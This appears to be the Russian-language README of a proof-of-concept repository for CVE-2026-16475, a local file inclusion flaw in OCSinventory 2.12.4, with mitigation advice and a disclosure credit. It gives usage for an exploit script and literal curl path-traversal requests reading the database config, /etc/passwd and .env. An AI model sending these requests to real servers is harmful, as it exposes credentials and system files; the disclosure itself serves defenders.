
Это официальный репозиторий с PoC для CVE-2026-16475, LFI в OCSinventory 2.12.4.
Уязвимость Local File Inclusion в OCSinventory 2.12.4
CVE ID: CVE-2026-16475
Оценка CVSS: 6.9 (Средняя)
CWE: CWE-98 (Некорректный контроль имени файла для инструкции Include/Require в PHP-программе)
Затронутая версия: OCSinventory 2.12.4
Статус: Исправлено в последних версиях
Уязвимость локального включения файлов (Local File Inclusion, LFI) существует в конечной точке /ajax/teledeployoptions.php из-за некорректной очистки параметра linkedoptions перед его использованием в операции динамического включения XML-файлов.
Конечная точка предназначена для загрузки XML-файлов конфигурации, но не проверяет должным образом параметр linkedoptions, что позволяет проводить атаки с обходом пути (path traversal).
Неаутентифицированный удалённый злоумышленник может использовать эту уязвимость для:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Опции:
-u, --url - Целевой URL (обязательно)-v, --verbose - Подробный вывод-o, --output - Сохранить успешно прочитанные данные в файлПример:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Отредактируйте переменную BASE_URL в скрипте:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Для пользователей:
Для разработчиков:
basename() или аналогичные функции для предотвращения обхода путиПримечание: CVE-2026-16475 координируется через INCIBE и может ещё не быть проиндексирован в NVD. Обращайтесь к источнику INCIBE для получения авторитетной информации.
Только для образовательных целей и авторизованного тестирования
Полное юридическое уведомление см. в DISCLAIMER.md.
Adrián Ferrer Tarí
Ответственное раскрытие координируется через INCIBE